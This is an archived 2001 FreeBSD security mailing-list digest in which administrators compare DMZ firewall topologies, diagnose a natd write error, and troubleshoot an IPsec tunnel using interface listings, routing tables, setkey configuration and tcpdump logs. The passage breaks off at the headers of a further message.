hades.hell.gr (8.11.6/8.11.6) id fANAS9S09853; Fri, 23 Nov 2001 12:28:09 +0200 (EET) (envelope-from charon@labs.gr) Date: Fri, 23 Nov 2001 12:28:09 +0200 From: Giorgos Keramidas To: Krzysztof Zaraska Cc: security@FreeBSD.ORG Subject: Re: Firewall design [was: Re: Best security topology for FreeBSD] Message-ID: <20011123102809.GA9743@hades.hell.gr> References: <20011122031739.A226@gohan.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.23.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org [ ascii art reordering to cut a few lines of text ] Internet --- firewall --- internal | DMZ ------------------------------------------------------------ Internet --- firewall1 --- DMZ --- firewall2 --- internal ------------------------------------------------------------ On 2001-11-22 20:55:30, Krzysztof Zaraska wrote: > Could you please explain why the second design is better? I know it's > harder to properly construct the correct ruleset for the first topology, > but what are other problems? Two levels of firewall; one more barrier for intruders. If the same machine is used for the DMZ and internal firewall, and it is compromised, then both the DMZ and internal networks are wide open. This however is useless if you use exactly the same hardware/software both for the `external' and `internal' machines and still have two separate machines for the two firewalls. The same exploits/bugs that will let someone in at the external firewall, will let him break the internal firewall when the DMZ has been compromised. But by now we are deep into the paranoia territory :) -giorgos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 4:52:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 3F53037B416 for ; Fri, 23 Nov 2001 04:52:42 -0800 (PST) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id EAA12381; Fri, 23 Nov 2001 04:51:56 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda12379; Fri Nov 23 04:51:48 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.6/8.9.1) id fANCphT44859; Fri, 23 Nov 2001 04:51:43 -0800 (PST) Received: from UNKNOWN(10.1.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpda44853; Fri Nov 23 04:50:44 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.6/8.9.1) id fANCoha19105; Fri, 23 Nov 2001 04:50:43 -0800 (PST) Message-Id: <200111231250.fANCoha19105@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdR15157; Fri Nov 23 04:49:46 2001 X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: cjclark@alum.mit.edu Cc: Fernando Germano , security@FreeBSD.ORG Subject: Re: Best security topology for FreeBSD In-reply-to: Your message of "Thu, 22 Nov 2001 03:17:39 PST." <20011122031739.A226@gohan.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 23 Nov 2001 04:49:46 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <20011122031739.A226@gohan.cjclark.org>, "Crist J. Clark" writes: > It is sad to see this poor design, > > Internet > | > | > Firewall--"DMZ" > | > | > Internal > > Used so very, very much these days (I think thanks to several firewall > vendors pushing this as a standard design). > > A much better design, is > > Internet > | > | > Firewall1 > | > | > DMZ > | > | > Firewall2 > | > | > Internal > > (This design is actually where the term "DMZ" comes from since it > actually looks like one here.) Given the capability of today's firewalls, packet filtering software and packet filtering capabilities within routers, I don't see what the advantage of the second design would be in 2001. Actually today (2001), the second design is quite dangerous. Sure it protects your internal network, however it is more difficult to contain compromised systems from being used as a launching point to elsewhere on the Internet. If you want the additional protection of security through depth, try this: Internet | | Firewall1 -- DMZ | | Firewall2 | | Internal What does this give you? Well, your DMZ can be easily configured to protect not only you but make it difficult to launch attacks from your DMZ. The second firewall is a redundant firewall. If you see any messages in the second firewall's logs, you might want to investigate a possible compromise of your first firewall. Many organisations do this. For example, firewall 1 could be a packet filtering router while firewall 2 could be firewall with various proxy services, e.g. IP Filter's FTP proxy, or a firewall with NAT capability. Of course all of this depends on what you're trying to protect and how much you're willing to spend to protect whatever you're trying to protect. For many applications one firewall should be enough. Also, one could set up other firewalls within an internal network to control which hosts within your internal network have access to your most sensitive data, e.g. your financial records. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD Ministry of Management Services Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 5: 0:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from terminus.dnttm.ro (terminus.dnttm.ro [193.226.98.11]) by hub.freebsd.org (Postfix) with ESMTP id B63CE37B405 for ; Fri, 23 Nov 2001 05:00:19 -0800 (PST) Received: from unix.edc.dnttm.ro (edc.dnttm.ro [193.226.98.104]) by terminus.dnttm.ro (8.9.3/8.9.3) with ESMTP id PAA14653 for ; Fri, 23 Nov 2001 15:00:14 +0200 Received: (from root@localhost) by unix.edc.dnttm.ro (8.11.6/8.11.2) id fAND06e24987 for freebsd-security@freebsd.org; Fri, 23 Nov 2001 15:00:06 +0200 (EET) (envelope-from titus) Received: (from titus@localhost) by unix.edc.dnttm.ro (8.11.6/8.11.2av) id fAND04F24979 for freebsd-security@freebsd.org; Fri, 23 Nov 2001 15:00:04 +0200 (EET) (envelope-from titus) Date: Fri, 23 Nov 2001 15:00:04 +0200 From: titus manea To: freebsd-security@freebsd.org Subject: Re: natd: failed to write packet back Message-ID: <20011123150004.A24086@unix.edc.dnttm.ro> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The aliased packed is matching an ipfw deny rule that comes after the divert rule -- __________________________________________________________________________ Titus Manea | Eastern Digital Inc. Lab owner | http://2edc.com | +40-56-192091 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 5:57: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from pps.de (mail.pps.de [217.13.200.134]) by hub.freebsd.org (Postfix) with ESMTP id 63D4437B405 for ; Fri, 23 Nov 2001 05:56:59 -0800 (PST) Received: from jung7.pps.de (jung7.pps.de [192.9.200.17]) by pps.de (8.9.3/8.9.3) with ESMTP id PAA96355 for ; Fri, 23 Nov 2001 15:01:09 +0100 (CET) (envelope-from petros@pps.de) Received: from aprilsonne.pps.de by jung7.pps.de (8.9.3+Sun/ZRZ-Sol2) id OAA02769; Fri, 23 Nov 2001 14:56:51 +0100 (MET) Received: from aprilsonne by aprilsonne.pps.de (8.9.1b+Sun/ZRZ-Sol2) id OAA07362; Fri, 23 Nov 2001 14:56:51 +0100 (MET) Message-Id: <200111231356.OAA07362@aprilsonne.pps.de> Date: Fri, 23 Nov 2001 14:56:51 +0100 (MET) From: Peter Ross Reply-To: Peter Ross Subject: Re: natd: failed to write packet back To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Content-MD5: GJDOihcp/3GX57MvSDK9iA== X-Mailer: dtmail 1.3.0 @(#)CDE Version 1.3.5 SunOS 5.7 sun4u sparc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, > The aliased packed is matching an ipfw deny rule that comes after the > divert rule There isn't a matching message in /var/log/security.. All my deny rules are also log rules (including the last "deny log all from any to any") and it seems to work: there are entries caused by (other) denied packets. Peter Ross To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 10: 8:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from teardrop.ca (d141-197-100.home.cgocable.net [24.141.197.100]) by hub.freebsd.org (Postfix) with ESMTP id 00DE737B405 for ; Fri, 23 Nov 2001 10:08:39 -0800 (PST) Received: from teardrop.ca (cfikoswz@teardrop.ca [24.141.197.100]) by teardrop.ca (8.11.6/8.11.6) with ESMTP id fANI8R318147; Fri, 23 Nov 2001 13:08:27 -0500 (EST) (envelope-from teardrop@teardrop.ca) X-Authentication-Warning: teardrop.ca: mail owned process doing -bs Date: Fri, 23 Nov 2001 13:08:27 -0500 (EST) From: Paul Miseiko To: Peter Ross Cc: freebsd-security@FreeBSD.ORG Subject: Re: natd: failed to write packet back (Permission denied) In-Reply-To: <200111231146.MAA24434@aprilsonne.pps.de> Message-ID: <20011123130628.P18084-100000@teardrop.ca> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I get that message sometimes myself. In my case it has to do with my insane firewall. Between the NATd and the Internal Network, all proto and port ranges are passed/allowed. While, between the NATd and the External Network (internet) very few outbound and even fewer inbound port(s) are allowed. If I drop all my firewall rules and just do diverting and passing of all traffic between all interfaces the error goes away; However, do too my paranoid nature I'll be living with that error instead (*^_^*) Paul Miseiko /\/ esoteric@EFNet /\/ http://teardrop.ca On Fri, 23 Nov 2001, Peter Ross wrote: > Hi, > > last month I installed a working (AFAIK;-) firewall using FreeBSD 4.4, ipfw > and natd. > > Sometimes I get a message: > > > Nov 22 17:31:25 tor natd[456]: failed to write packet back (Permission > > denied) > > Nov 22 17:31:58 tor last message repeated 6 times > > There are approximately 30 packets per day causing this message. > > I can't find a corresponding message in the ipfw-logs. > > While my firewall continues to work, my former FreeBSD 3.x firewall stopped > in this case from time to time. > > Should I be worried? I hope there isn't a mistake in the ipfw rules.. > > Thanks for advice > Peter Ross > > ******************************************************* > Dipl.Inf. Peter Ross Mail: petros@pps.de > Presse Programm Service Berlin - Systems administration > ******************************************************* > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 10:47:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from straylight.ringlet.net (straylight.ringlet.net [217.75.134.254]) by hub.freebsd.org (Postfix) with SMTP id 1B0B937B417 for ; Fri, 23 Nov 2001 10:46:58 -0800 (PST) Received: (qmail 1597 invoked by uid 1000); 23 Nov 2001 18:44:44 -0000 Date: Fri, 23 Nov 2001 20:44:44 +0200 From: Peter Pentchev To: security@FreeBSD.org Subject: IPsec tunnel (manual keying) configuration problem Message-ID: <20011123204444.A1304@straylight.oblivion.bg> Mail-Followup-To: security@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I'm having a IPsec configuration problem, whereby the two endpoints tunnelling two LAN's fail to see packets to their own "internal" addresses. One of the hosts, the so-called 'portal', is a two-NIC machine with a couple of extras: xl0: flags=8843 mtu 1500 inet 217.75.128.47 netmask 0xffffff00 broadcast 217.75.128.255 ether 00:50:04:52:62:d2 media: Ethernet 100baseTX status: active xl1: flags=8843 mtu 1500 inet 217.75.134.1 netmask 0xffffffc0 broadcast 217.75.134.63 inet 217.75.134.11 netmask 0xffffffff broadcast 217.75.134.11 inet6 3ffe:400:10c0::1 prefixlen 64 ether 00:04:76:18:65:aa media: Ethernet autoselect (100baseTX ) status: active lo0: flags=8049 mtu 16384 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x3 inet 127.0.0.1 netmask 0xff000000 ppp0: flags=8010 mtu 1500 sl0: flags=c010 mtu 552 faith0: flags=8001 mtu 1500 stf0: flags=1 mtu 1280 gif1: flags=8051 mtu 1280 tunnel inet 217.75.134.1 --> 217.75.128.46 gif2: flags=8051 mtu 1280 tunnel inet 217.75.134.1 --> 128.176.191.66 tun0: flags=8051 mtu 1524 inet 172.16.32.5 --> 172.16.32.1 netmask 0xffff0000 Opened by PID 190 tun1: flags=8010 mtu 1500 -------- end of ifconfig.portal At the time of the problem, its routing table read: Routing tables Internet: Destination Gateway Flags Refs Use Netif Expire default 217.75.128.1 UGSc 4 14141 xl0 127.0.0.1 127.0.0.1 UH 0 0 lo0 172.16/12 172.16.32.1 UGSc 1 23267 tun0 172.16.32.1 172.16.32.5 UH 2 0 tun0 217.75.128 link#1 UC 5 0 xl0 217.75.128.1 0:1:42:66:cd:0 UHLW 3 0 xl0 1188 217.75.128.2 0:50:4:57:e:c5 UHLW 0 34 xl0 1143 217.75.128.9 0:50:da:51:16:60 UHLW 1 796 xl0 1157 217.75.128.21 0:10:7b:14:4c:74 UHLW 2 0 xl0 962 217.75.128.252 0:60:8c:cb:43:c7 UHLW 0 76 xl0 1002 217.75.134.0 ff:ff:ff:ff:ff:ff UHLWb 0 6 xl1 => 217.75.134/26 link#2 UC 7 0 xl1 217.75.134.1 0:4:76:18:65:aa UHLW 0 3 lo0 217.75.134.9 0:4:76:21:d9:76 UHLW 0 3505 xl1 1151 217.75.134.10 0:1:2:1c:7e:2 UHLW 0 9945 xl1 830 217.75.134.11/32 link#2 UC 0 0 xl1 217.75.134.13 0:1:2:1c:7e:2 UHLW 0 26948 xl1 816 217.75.134.18 0:1:2:1c:7e:2 UHLW 0 88 xl1 18 217.75.134.63 ff:ff:ff:ff:ff:ff UHLWb 0 4 xl1 217.75.134.64/29 link#2 UCSc 1 0 xl1 217.75.134.72/29 217.75.130.66 UGSc 0 280 xl0 217.75.134.96/27 217.75.128.21 UGSc 1 61926 xl0 ------------ end of netstat -rnfinet for portal The other host, called 'vn', has only one network card: xl0: flags=8943 mtu 1500 inet 192.168.9.1 netmask 0xffffff00 broadcast 192.168.9.255 inet 217.75.130.66 netmask 0xfffffffc broadcast 217.75.130.67 inet 192.168.9.2 netmask 0xffffffff broadcast 192.168.9.2 inet 217.75.134.73 netmask 0xfffffff8 broadcast 217.75.134.79 ether 00:04:76:9e:d8:a7 media: Ethernet autoselect (100baseTX ) status: active lo0: flags=8049 mtu 16384 inet6 ::1 prefixlen 128 inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 inet 127.0.0.1 netmask 0xff000000 ----------- end of ifconfig.vn And at the time of the problem, its routing table was: Routing tables Internet: Destination Gateway Flags Refs Use Netif Expire 127.0.0.1 127.0.0.1 UH 0 0 lo0 192.168.9 link#1 UC 2 0 xl0 192.168.9.1 0:4:76:9e:d8:a7 UHLW 0 10 lo0 192.168.9.2 0:4:76:9e:d8:a7 UHLW 1 46 lo0 => 192.168.9.2/32 link#1 UC 1 0 xl0 192.168.9.13 0:e0:18:18:f2:e UHLW 0 5436 xl0 943 217.75.128.47 217.75.130.65 UGHS 7 10463 xl0 217.75.130.64/30 link#1 UC 1 0 xl0 217.75.130.65 0:1:42:3:4e:e4 UHLW 1 294 xl0 176 217.75.134/26 217.75.128.47 UGSc 2 238 xl0 217.75.134.72/29 link#1 UC 2 0 xl0 217.75.134.73 0:4:76:9e:d8:a7 UHLW 1 17 lo0 217.75.134.74 0:e0:18:18:f2:e UHLW 1 148 xl0 294 --------------- end of netstat -rnfinet for vn The IPsec configuration files (fed to setkey -c) are: ---- portal: # Start in the clear: flush all rules flush ; spdflush ; # # Regional offices # # - Varna # spdadd 217.75.134.0/26 217.75.134.72/29 any -P out ipsec ah/tunnel/217.75.128.47-217.75.130.66/require ; spdadd 217.75.134.72/29 217.75.134.0/26 any -P in ipsec ah/tunnel/217.75.130.66-217.75.128.47/require ; add 217.75.128.47 217.75.130.66 ah-old 0x100103 -m any -A keyed-md5 "a 16char pass :P" ; add 217.75.130.66 217.75.128.47 ah-old 0x100104 -m any -A keyed-md5 "another password" ; ---- vn: # Flush all rules flush ; spdflush ; # # The NOC at Bulgaria Online # spdadd 217.75.134.72/29 217.75.134.0/26 any -P out ipsec ah/tunnel/217.75.130.66-217.75.128.47/require ; spdadd 217.75.134.0/26 217.75.134.72/29 any -P in ipsec ah/tunnel/217.75.128.47-217.75.130.66/require ; add 217.75.130.66 217.75.128.47 ah-old 0x100104 -m any -A keyed-md5 "another password" ; add 217.75.128.47 217.75.130.66 ah-old 0x100103 -m any -A keyed-md5 "a 16char pass :P" ; ---- end of IPsec config Now for the problem itself :) After setting up the IPsec connection, the situation is as follows: - 217.75.134.74 (behind vn) to 217.75.134.10 (behind portal) OK - 217.75.134.74 (behind vn) to 217.75.134.1 (portal itself) FAIL - 217.75.134.73 (vn itself) to 218.75.134.10 (behind portal) FAIL - 217.75.134.73 (vn itself) to 217.75.134.1 (portal itself) FAIL Logs from 'tcpdump -nli xl0 -s 1500 host 217.75.128.47' ran on vn: -------- host behind vn to host behind portal (OK) tcpdump: listening on xl0 20:25:35.441768 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x9bc32f2d): 217.75.134.74.1109 > 217.75.134.10.22: S [tcp sum ok] 4036805732:4036805732(0) win 16384 (DF) [tos 0x10] (ttl 63, id 1130, len 60) [tos 0x10] (ttl 64, id 299, len 104, bad cksum 0!) 20:25:35.458566 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0xd8cf8cd6): 217.75.134.10.22 > 217.75.134.74.1109: S [tcp sum ok] 3978490178:3978490178(0) ack 4036805733 win 17376 (DF) (ttl 63, id 55805, len 60) (ttl 61, id 234, len 104) 20:25:35.458796 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x650382ec): 217.75.134.74.1109 > 217.75.134.10.22: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) [tos 0x10] (ttl 63, id 3364, len 52) [tos 0x10] (ttl 64, id 300, len 96, bad cksum 0!) 20:25:35.478764 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0xa51ef937): 217.75.134.10.22 > 217.75.134.74.1109: P [tcp sum ok] 1:53(52) ack 1 win 17376 (DF) (ttl 63, id 3203, len 104) (ttl 61, id 235, len 148) 20:25:35.577099 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x3b41569): 217.75.134.74.1109 > 217.75.134.10.22: . [tcp sum ok] 1:1(0) ack 53 win 17376 (DF) [tos 0x10] (ttl 63, id 9477, len 52) [tos 0x10] (ttl 64, id 301, len 96, bad cksum 0!) 20:25:42.099448 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x6641983d): 217.75.134.74.1109 > 217.75.134.10.22: F [tcp sum ok] 1:1(0) ack 53 win 17376 (DF) [tos 0x10] (ttl 63, id 12887, len 52) [tos 0x10] (ttl 64, id 302, len 96, bad cksum 0!) 20:25:42.113415 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x7086a783): 217.75.134.10.22 > 217.75.134.74.1109: . [tcp sum ok] 53:53(0) ack 2 win 17376 (DF) (ttl 63, id 17609, len 52) (ttl 61, id 236, len 96) 20:25:42.116880 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x79d0d138): 217.75.134.10.22 > 217.75.134.74.1109: F [tcp sum ok] 53:53(0) ack 2 win 17376 (DF) (ttl 63, id 8410, len 52) (ttl 61, id 237, len 96) 20:25:42.117077 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x140ec93): 217.75.134.74.1109 > 217.75.134.10.22: . [tcp sum ok] 2:2(0) ack 54 win 17375 (DF) [tos 0x10] (ttl 63, id 50496, len 52) [tos 0x10] (ttl 64, id 303, len 96, bad cksum 0!) ------------ host behind vn to portal itself (FAIL) tcpdump: listening on xl0 20:24:50.279253 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x3dcec5fd): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 47298, len 60) [tos 0x10] (ttl 64, id 291, len 104, bad cksum 0!) 20:24:53.271523 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x1f3e68ca): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 41118, len 60) [tos 0x10] (ttl 64, id 292, len 104, bad cksum 0!) 20:24:56.271906 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x35b524de): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 52166, len 60) [tos 0x10] (ttl 64, id 293, len 104, bad cksum 0!) 20:24:59.272356 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xdc5787db): 217.75.134.74.1107 > 217.75.134.1.22: S [tcp sum ok] 3308045531:3308045531(0) win 16384 (DF) [tos 0x10] (ttl 63, id 42178, len 44) [tos 0x10] (ttl 64, id 294, len 88, bad cksum 0!) ------------- vn itself to portal itself (FAIL) tcpdump: listening on xl0 20:28:40.050942 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xa7127819): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 53427, len 60) [tos 0x10] (ttl 64, id 304, len 104, bad cksum 0!) 20:28:43.047830 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xc6e7cae3): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 4095, len 60) [tos 0x10] (ttl 64, id 305, len 104, bad cksum 0!) 20:28:46.047863 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x28466906): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 52608, len 60) [tos 0x10] (ttl 64, id 306, len 104, bad cksum 0!) 20:28:49.047896 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x5289ac1f): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 24215, len 44) [tos 0x10] (ttl 64, id 307, len 88, bad cksum 0!) 20:28:52.047937 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x371ee2d8): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 35456, len 44) [tos 0x10] (ttl 64, id 308, len 88, bad cksum 0!) 20:28:55.047969 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xf803410b): 217.75.134.73.1046 > 217.75.134.1.22: S [tcp sum ok] 905787053:905787053(0) win 16384 (DF) [tos 0x10] (ttl 64, id 43261, len 44) [tos 0x10] (ttl 64, id 309, len 88, bad cksum 0!) ------------- vn itself to host behind portal (FAIL) tcpdump: listening on xl0 20:29:09.460730 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x1c53e07): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 8588, len 60) [tos 0x10] (ttl 64, id 310, len 104, bad cksum 0!) 20:29:09.478706 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x90226b35): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 27769, len 60) (ttl 61, id 238, len 104) 20:29:12.458160 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xb0f952e5): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 64461, len 60) [tos 0x10] (ttl 64, id 311, len 104, bad cksum 0!) 20:29:12.469876 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x81e6ffb3): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 13929, len 60) (ttl 61, id 239, len 104) 20:29:12.474621 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x699e1c14): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 44865, len 52) (ttl 61, id 240, len 96) 20:29:15.458207 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xa4ccca90): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 40589, len 60) [tos 0x10] (ttl 64, id 312, len 104, bad cksum 0!) 20:29:15.475532 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x5ce20964): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 56069, len 52) (ttl 61, id 241, len 96) 20:29:18.458225 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0x9afbb58d): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 63933, len 44) [tos 0x10] (ttl 64, id 313, len 88, bad cksum 0!) 20:29:18.477070 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x62f6b0c2): 217.75.134.10.22 > 217.75.134.73.1047: S [tcp sum ok] 956821190:956821190(0) ack 920219842 win 17376 (DF) (ttl 63, id 60770, len 60) (ttl 61, id 242, len 104) 20:29:18.480330 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x5d5eca31): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 26186, len 52) (ttl 61, id 243, len 96) 20:29:21.458268 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xb176762f): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 37624, len 44) [tos 0x10] (ttl 64, id 314, len 88, bad cksum 0!) 20:29:21.474610 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x8219bff6): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 46620, len 52) (ttl 61, id 244, len 96) 20:29:24.458301 217.75.130.66 > 217.75.128.47: AH(spi=0x00100104,sumlen=16,seq=0xf3f9d722): 217.75.134.73.1047 > 217.75.134.10.22: S [tcp sum ok] 920219841:920219841(0) win 16384 (DF) [tos 0x10] (ttl 64, id 1784, len 44) [tos 0x10] (ttl 64, id 315, len 88, bad cksum 0!) 20:29:24.471233 217.75.128.47 > 217.75.130.66: AH(spi=0x00100103,sumlen=16,seq=0x146f4b4c): 217.75.134.10.22 > 217.75.134.73.1047: . [tcp sum ok] 1:1(0) ack 1 win 17376 (DF) (ttl 63, id 40803, len 52) (ttl 61, id 245, len 96) The way I read those logs, vn and portal forward packets to other hosts just fine. However, when a packet arrives for the endpoints themselves, it somehow does not reach the TCP stack or something - at least it does not reach the part where the handshake SYN's and ACK's are processed. A connection to portal shows just initial SYN's on the wire, portal does not process them at all. A similar tcpdump ran on portal at the time shows *just the same* - even portal's TCP stack does not receive/process the SYN :( A connection from vn to a host behind portal shows the SYN/ACK arriving back at vn, but then vn keeps retransmitting its SYN - it has neither received the ACK, nor the other side's SYN :( Any help or just ideas would be welcome.. G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 23 10:48:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from Mail6.nc.rr.com (fe6.southeast.rr.com [24.93.67.53]) by hub.freebsd.org (Postfix) with ESMTP id BB59C37B405; Fri, 23 Nov 2001 10:48:45 -0800 (PST) Received: from i8k.babbleon.org ([66.57.85.154]) by Mail6.nc.rr.com with Microsoft SMTPSVC(5.5.1877.687.68); Fri, 23 Nov 2001 12:36:33 -0500 Content-Type: text/plain; charset="iso-8859-1" From: Brian T.Schellenberger To: "Anthony Atkielski" , "Gary W. Swearingen" Subject: Re: setuid on nethack? Date: Fri, 23 Nov 2001 12:35:42 -0500 